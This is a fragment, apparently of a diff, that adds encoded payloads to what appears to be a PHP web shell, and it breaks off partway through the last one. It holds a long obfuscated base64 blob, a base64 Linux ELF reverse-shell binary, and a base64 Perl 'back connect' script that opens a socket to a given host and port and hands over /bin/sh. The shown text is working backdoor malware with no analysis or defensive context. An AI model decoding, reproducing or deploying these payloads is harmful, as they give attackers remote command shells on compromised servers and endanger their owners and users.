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";
+
+$back_connect_c="f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAA2IUECDQAAABMDAAAAAAAADQAIAAHACgAHAAZAAYAAAA0AAAANIAECDSABAjgAAAA4AAAAAUAAAAEAAAAAwAAABQBAAAUgQQIFIEECBMAAAATAAAABAAAAAEAAAABAAAAAAAAAACABAgAgAQILAkAACwJAAAFAAAAABAAAAEAAAAsCQAALJkECCyZBAg4AQAAPAEAAAYAAAAAEAAAAgAAAEAJAABAmQQIQJkECMgAAADIAAAABgAAAAQAAAAEAAAAKAEAACiBBAgogQQIIAAAACAAAAAEAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAL2xpYi9sZC1saW51eC5zby4yAAAEAAAAEAAAAAEAAABHTlUAAAAAAAIAAAACAAAABQAAABEAAAAUAAAAAAAAAAAAAAARAAAAEgAAAAcAAAAKAAAACwAAAAgAAAAPAAAAAwAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAAABgAAAAAAAAABAAAAAAAAAAkAAAAAAAAADAAAAAAAAAAAAAAADQAAAA4AAAACAAAABAAAAAAAAAAAAAAAAAAAAAAAAAA2AAAAAAAAABwBAAASAAAArAAAAAAAAABxAAAAEgAAADwAAAAAAAAACwIAABIAAABIAAAAAAAAAH0AAAASAAAAjAAAAAAAAACsAQAAEgAAAKUAAAAAAAAArwAAABIAAABjAAAAAAAAACcAAAASAAAAkwAAAAAAAADdAAAAEgAAAEMAAAAAAAAAOgAAABIAAABcAAAAAAAAAKoBAAASAAAAVgAAAAAAAAA2AAAAEgAAAHMAAAAAAAAA2QAAABIAAAB4AAAAAAAAACgAAAASAAAAbQAAAAAAAAAOAAAAEgAAAC4AAAAAAAAAeAAAABIAAAB9AAAA8IgECAQAAAARAA4ATwAAAAAAAAA5AAAAEgAAAAEAAAAAAAAAAAAAACAAAAAVAAAAAAAAAAAAAAAgAAAAAF9Kdl9SZWdpc3RlckNsYXNzZXMAX19nbW9uX3N0YXJ0X18AbGliYy5zby42AGNvbm5lY3QAZXhlY2wAcGVycm9yAGR1cDIAc3lzdGVtAHNvY2tldABiemVybwBzdHJjYXQAaW5ldF9hZGRyAGh0b25zAGV4aXQAYXRvaQBfSU9fc3RkaW5fdXNlZABkYWVtb24AX19saWJjX3N0YXJ0X21haW4Ac3RybGVuAGNsb3NlAEdMSUJDXzIuMAAAAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAEAAgAAAAAAAQABACQAAAAQAAAAAAAAABBpaQ0AAAIAsgAAAAAAAAAImgQIBhMAABiaBAgHAQAAHJoECAcCAAAgmgQIBwMAACSaBAgHBAAAKJoECAcFAAAsmgQIBwYAADCaBAgHBwAANJoECAcIAAA4mgQIBwkAADyaBAgHCgAAQJoECAcLAABEmgQIBwwAAEiaBAgHDQAATJoECAcOAABQmgQIBw8AAFSaBAgHEQAAVYnlg+wI6EEBAADolAEAAOjnAwAAycMA/zUQmgQI/yUUmgQIAAAAAP8lGJoECGgAAAAA6eD/////JRyaBAhoCAAAAOnQ/////yUgmgQIaBAAAADpwP////8lJJoECGgYAAAA6bD/////JSiaBAhoIAAAAOmg/////yUsmgQIaCgAAADpkP////8lMJoECGgwAAAA6YD/////JTSaBAhoOAAAAOlw/////yU4mgQIaEAAAADpYP////8lPJoECGhIAAAA6VD/////JUCaBAhoUAAAAOlA/////yVEmgQIaFgAAADpMP////8lSJoECGhgAAAA6SD/////JUyaBAhoaAAAAOkQ/////yVQmgQIaHAAAADpAP////8lVJoECGh4AAAA6fD+//8x7V6J4YPk8FBUUmhoiAQIaBSIBAhRVmiAhgQI6E/////0kJBVieVT6AAAAABbgcMHFAAAUouD/P///4XAdAL/0FhbycOQkJBVieWD7AiAPWSaBAgAdA/rH412AIPABKNgmgQI/9KhYJoECIsQhdJ168YFZJoECAHJw4n2VYnlg+wIoTyZBAiFwHQZuAAAAACFwHQQg+wMaDyZBAj/0IPEEI12AMnDkJBVieVXVlOD7EyD5PC4AAAAAIPAD4PAD8HoBMHgBCnEjX2ovvSIBAj8uQcAAADzpI19r/y5DgAAALAA86qD7AhqAGoB6FD+//+DxBBmx0XIAgCD7AyLRQyDwAj/MOi3/v//g8QQD7fAg+wMUOi4/v//g8QQZolFyoPsDItFDIPABP8w6DH+//+DxBCJRcyD7AiLRQyDwASD7AT/MOgI/v//g8QIicOLRQyDwAiD7AT/MOjz/f//g8QIjQQDQFCLRQyDwAT/MOgu/v//g8QQg+wEagZqAWoC6G3+//+DxBCJReSD7ARqEI1FyFD/deToRv7//4PEEIXAeRqD7AxoCYkECOhy/f//g8QQg+wMagDo9f3//4PsCItFDP8wjUWoUOjE/f//g8QQg+wMjUWoUOhV/f//g8QQg+wIagD/deTolf3//4PEEIPsCGoB/3Xk6IX9//+DxBCD7AhqAv915Oh1/f//g8QQg+wEagBoF4kECGgdiQQI6N78//+DxBCD7Az/deTo4Pz//4PEEI1l9FteX8nDkFWJ5VdWU4PsDOgAAAAAW4HD6hEAAOiC/P//jYMg////jZMg////iUXwKdAx9sH4AjnGcxaJ14n2/xSyi03wKflGwfkCOc6J+nLug8QMW15fycOJ9lWJ5VdWU+gAAAAAW4HDmREAAI2DIP///427IP///yn4wfgCg+wMjXD/6wWQ/xS3ToP+/3X36C4AAACDxAxbXl/Jw5CQVYnlU1K7LJkECKEsmQQI6wqNdgCD6wT/0IsDg/j/dfRYW8nDVYnlU+gAAAAAW4HDMxEAAFDoOv3//1lbycMAAAMAAAABAAIAcm0gLWYgAAAAAAAAAAAAAAAAAAAAWy1dIGNvbm5lY3QoKQBzaCAtaQAvYmluL3NoAAAAAAAAAAD/////AAAAAP////8AAAAAAAAAAAEAAAAkAAAADAAAALCEBAgNAAAA0IgECAQAAABIgQQIBQAAACSDBAgGAAAA5IEECAoAAAC8AAAACwAAABAAAAAVAAAAAAAAAAMAAAAMmgQIAgAAAIAAAAAUAAAAEQAAABcAAAAwhAQIEQAAACiEBAgSAAAACAAAABMAAAAIAAAA/v//bwiEBAj///9vAQAAAPD//2/ggwQIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAECZBAgAAAAAAAAAAN6EBAjuhAQI/oQECA6FBAgehQQILoUECD6FBAhOhQQIXoUECG6FBAh+hQQIjoUECJ6FBAiuhQQIvoUECM6FBAgAAAAAAAAAADiZBAgAR0NDOiAoR05VKSAzLjQuNSAyMDA1MTIwMSAoUmVkIEhhdCAzLjQuNS0yKQAAR0NDOiAoR05VKSAzLjQuNSAyMDA1MTIwMSAoUmVkIEhhdCAzLjQuNS0yKQAAR0NDOiAoR05VKSAzLjQuNSAyMDA1MTIwMSAoUmVkIEhhdCAzLjQuNS0yKQAAR0NDOiAoR05VKSAzLjQuNSAyMDA1MTIwMSAoUmVkIEhhdCAzLjQuNS0yKQAAR0NDOiAoR05VKSAzLjQuNSAyMDA1MTIwMSAoUmVkIEhhdCAzLjQuNS0yKQAAR0NDOiAoR05VKSAzLjQuNSAyMDA1MTIwMSAoUmVkIEhhdCAzLjQuNS0yKQAALnN5bXRhYgAuc3RydGFiAC5zaHN0cnRhYgAuaW50ZXJwAC5ub3RlLkFCSS10YWcALmhhc2gALmR5bnN5bQAuZHluc3RyAC5nbnUudmVyc2lvbgAuZ251LnZlcnNpb25fcgAucmVsLmR5bgAucmVsLnBsdAAuaW5pdAAudGV4dAAuZmluaQAucm9kYXRhAC5laF9mcmFtZQAuY3RvcnMALmR0b3JzAC5qY3IALmR5bmFtaWMALmdvdAAuZ290LnBsdAAuZGF0YQAuYnNzAC5jb21tZW50AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAbAAAAAQAAAAIAAAAUgQQIFAEAABMAAAAAAAAAAAAAAAEAAAAAAAAAIwAAAAcAAAACAAAAKIEECCgBAAAgAAAAAAAAAAAAAAAEAAAAAAAAADEAAAAFAAAAAgAAAEiBBAhIAQAAnAAAAAQAAAAAAAAABAAAAAQAAAA3AAAACwAAAAIAAADkgQQI5AEAAEABAAAFAAAAAQAAAAQAAAAQAAAAPwAAAAMAAAACAAAAJIMECCQDAAC8AAAAAAAAAAAAAAABAAAAAAAAAEcAAAD///9vAgAAAOCDBAjgAwAAKAAAAAQAAAAAAAAAAgAAAAIAAABUAAAA/v//bwIAAAAIhAQICAQAACAAAAAFAAAAAQAAAAQAAAAAAAAAYwAAAAkAAAACAAAAKIQECCgEAAAIAAAABAAAAAAAAAAEAAAACAAAAGwAAAAJAAAAAgAAADCEBAgwBAAAgAAAAAQAAAALAAAABAAAAAgAAAB1AAAAAQAAAAYAAACwhAQIsAQAABcAAAAAAAAAAAAAAAQAAAAAAAAAcAAAAAEAAAAGAAAAyIQECMgEAAAQAQAAAAAAAAAAAAAEAAAABAAAAHsAAAABAAAABgAAANiFBAjYBQAA+AIAAAAAAAAAAAAABAAAAAAAAACBAAAAAQAAAAYAAADQiAQI0AgAABoAAAAAAAAAAAAAAAQAAAAAAAAAhwAAAAEAAAACAAAA7IgECOwIAAA5AAAAAAAAAAAAAAAEAAAAAAAAAI8AAAABAAAAAgAAACiJBAgoCQAABAAAAAAAAAAAAAAABAAAAAAAAACZAAAAAQAAAAMAAAAsmQQILAkAAAgAAAAAAAAAAAAAAAQAAAAAAAAAoAAAAAEAAAADAAAANJkECDQJAAAIAAAAAAAAAAAAAAAEAAAAAAAAAKcAAAABAAAAAwAAADyZBAg8CQAABAAAAAAAAAAAAAAABAAAAAAAAACsAAAABgAAAAMAAABAmQQIQAkAAMgAAAAFAAAAAAAAAAQAAAAIAAAAtQAAAAEAAAADAAAACJoECAgKAAAEAAAAAAAAAAAAAAAEAAAABAAAALoAAAABAAAAAwAAAAyaBAgMCgAATAAAAAAAAAAAAAAABAAAAAQAAADDAAAAAQAAAAMAAABYmgQIWAoAAAwAAAAAAAAAAAAAAAQAAAAAAAAAyQAAAAgAAAADAAAAZJoECGQKAAAEAAAAAAAAAAAAAAAEAAAAAAAAAM4AAAABAAAAAAAAAAAAAABkCgAADgEAAAAAAAAAAAAAAQAAAAAAAAARAAAAAwAAAAAAAAAAAAAAcgsAANcAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAIAAAAAAAAAAAAAAKwQAABABQAAGwAAACwAAAAEAAAAEAAAAAkAAAADAAAAAAAAAAAAAADsFQAALAMAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSBBAgAAAAAAwABAAAAAAAogQQIAAAAAAMAAgAAAAAASIEECAAAAAADAAMAAAAAAOSBBAgAAAAAAwAEAAAAAAAkgwQIAAAAAAMABQAAAAAA4IMECAAAAAADAAYAAAAAAAiEBAgAAAAAAwAHAAAAAAAohAQIAAAAAAMACAAAAAAAMIQECAAAAAADAAkAAAAAALCEBAgAAAAAAwAKAAAAAADIhAQIAAAAAAMACwAAAAAA2IUECAAAAAADAAwAAAAAANCIBAgAAAAAAwANAAAAAADsiAQIAAAAAAMADgAAAAAAKIkECAAAAAADAA8AAAAAACyZBAgAAAAAAwAQAAAAAAA0mQQIAAAAAAMAEQAAAAAAPJkECAAAAAADABIAAAAAAECZBAgAAAAAAwATAAAAAAAImgQIAAAAAAMAFAAAAAAADJoECAAAAAADABUAAAAAAFiaBAgAAAAAAwAWAAAAAABkmgQIAAAAAAMAFwAAAAAAAAAAAAAAAAADABgAAAAAAAAAAAAAAAAAAwAZAAAAAAAAAAAAAAAAAAMAGgAAAAAAAAAAAAAAAAADABsAAQAAAPyFBAgAAAAAAgAMABEAAAAAAAAAAAAAAAQA8f8cAAAALJkECAAAAAABABAAKgAAADSZBAgAAAAAAQARADgAAAA8mQQIAAAAAAEAEgBFAAAAYJoECAAAAAABABYASQAAAGSaBAgBAAAAAQAXAFUAAAAghgQIAAAAAAIADABrAAAAVIYECAAAAAACAAwAEQAAAAAAAAAAAAAABADx/3cAAAAwmQQIAAAAAAEAEACEAAAAOJkECAAAAAABABEAkQAAACiJBAgAAAAAAQAPAJ8AAAA8mQQIAAAAAAEAEgCrAAAArIgECAAAAAACAAwAwQAAAAAAAAAAAAAABADx/8gAAAAAAAAAHAEAABIAAADZAAAAQJkECAAAAAARABMA4gAAAAAAAABxAAAAEgAAAPMAAADsiAQIBAAAABEADgD6AAAAAAAAAAsCAAASAAAADAEAACyZBAgAAAAAEALx/x0BAABcmgQIAAAAABECFgAqAQAAaIgECEIAAAASAAwAOgEAAAAAAAB9AAAAEgAAAEwBAACwhAQIAAAAABIACgBSAQAAAAAAAKwBAAASAAAAZAEAANiFBAgAAAAAEgAMAGsBAAAAAAAArwAAABIAAAB9AQAALJkECAAAAAAQAvH/kAEAABSIBAhSAAAAEgAMAKABAAAAAAAAJwAAABIAAAC1AQAAZJoECAAAAAAQAPH/wQEAAICGBAiTAQAAEgAMAMYBAAAAAAAA3QAAABIAAADjAQAALJkECAAAAAAQAvH/9AEAAAAAAAA6AAAAEgAAAAQCAAAAAAAAqgEAABIAAAAWAgAAWJoECAAAAAAgABYAIQIAANCIBAgAAAAAEgANACcCAAAsmQQIAAAAABAC8f87AgAAAAAAADYAAAASAAAATAIAAAAAAADZAAAAEgAAAFwCAAAAAAAAKAAAABIAAABsAgAAZJoECAAAAAAQAPH/cwIAAAyaBAgAAAAAEQAVAIkCAABomgQIAAAAABAA8f+OAgAAAAAAAA4AAAASAAAAnwIAAAAAAAB4AAAAEgAAALICAAAsmQQIAAAAABAC8f/FAgAA8IgECAQAAAARAA4A1AIAAFiaBAgAAAAAEAAWAOECAAAAAAAAOQAAABIAAADzAgAAAAAAAAAAAAAgAAAABwMAACyZBAgAAAAAEALx/x0DAAAAAAAAAAAAACAAAAAAY2FsbF9nbW9uX3N0YXJ0AGNydHN0dWZmLmMAX19DVE9SX0xJU1RfXwBfX0RUT1JfTElTVF9fAF9fSkNSX0xJU1RfXwBwLjAAY29tcGxldGVkLjEAX19kb19nbG9iYWxfZHRvcnNfYXV4AGZyYW1lX2R1bW15AF9fQ1RPUl9FTkRfXwBfX0RUT1JfRU5EX18AX19GUkFNRV9FTkRfXwBfX0pDUl9FTkRfXwBfX2RvX2dsb2JhbF9jdG9yc19hdXgAYmFjay5jAGV4ZWNsQEBHTElCQ18yLjAAX0RZTkFNSUMAY2xvc2VAQEdMSUJDXzIuMABfZnBfaHcAcGVycm9yQEBHTElCQ18yLjAAX19maW5pX2FycmF5X2VuZABfX2Rzb19oYW5kbGUAX19saWJjX2NzdV9maW5pAHN5c3RlbUBAR0xJQkNfMi4wAF9pbml0AGRhZW1vbkBAR0xJQkNfMi4wAF9zdGFydABzdHJsZW5AQEdMSUJDXzIuMABfX2ZpbmlfYXJyYXlfc3RhcnQAX19saWJjX2NzdV9pbml0AGluZXRfYWRkckBAR0xJQkNfMi4wAF9fYnNzX3N0YXJ0AG1haW4AX19saWJjX3N0YXJ0X21haW5AQEdMSUJDXzIuMABfX2luaXRfYXJyYXlfZW5kAGR1cDJAQEdMSUJDXzIuMABzdHJjYXRAQEdMSUJDXzIuMABkYXRhX3N0YXJ0AF9maW5pAF9fcHJlaW5pdF9hcnJheV9lbmQAYnplcm9AQEdMSUJDXzIuMABleGl0QEBHTElCQ18yLjAAYXRvaUBAR0xJQkNfMi4wAF9lZGF0YQBfR0xPQkFMX09GRlNFVF9UQUJMRV8AX2VuZABodG9uc0BAR0xJQkNfMi4wAGNvbm5lY3RAQEdMSUJDXzIuMABfX2luaXRfYXJyYXlfc3RhcnQAX0lPX3N0ZGluX3VzZWQAX19kYXRhX3N0YXJ0AHNvY2tldEBAR0xJQkNfMi4wAF9Kdl9SZWdpc3RlckNsYXNzZXMAX19wcmVpbml0X2FycmF5X3N0YXJ0AF9fZ21vbl9zdGFydF9fAA==";
+
+$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiOyc7DQokc3lzdGVtMT0gJ2VjaG8gImBpZGAiOyc7DQokc3lzdGVtMj0gJ2VjaG8gImBwd2RgIjsnOw0KJHN5c3RlbTM9ICdlY2hvICJgd2hvYW1pYEBgaG9zdG5hbWVgOn4gPiI7JzsNCiRzeXN0ZW00PSAnL2Jpbi9zaCc7DQokMD0kY21kOw0KJHRhcmdldD0kQVJHVlswXTsNCiRwb3J0PSRBUkdWWzFdOw0KJGlhZGRyPWluZXRfYXRvbigkdGFyZ2V0KSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQokcGFkZHI9c29ja2FkZHJfaW4oJHBvcnQsICRpYWRkcikgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHByb3RvPWdldHByb3RvYnluYW1lKCd0Y3AnKTsNCnNvY2tldChTT0NLRVQsIFBGX0lORVQsIFNPQ0tfU1RSRUFNLCAkcHJvdG8pIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCmNvbm5lY3QoU09DS0VULCAkcGFkZHIpIHx8IG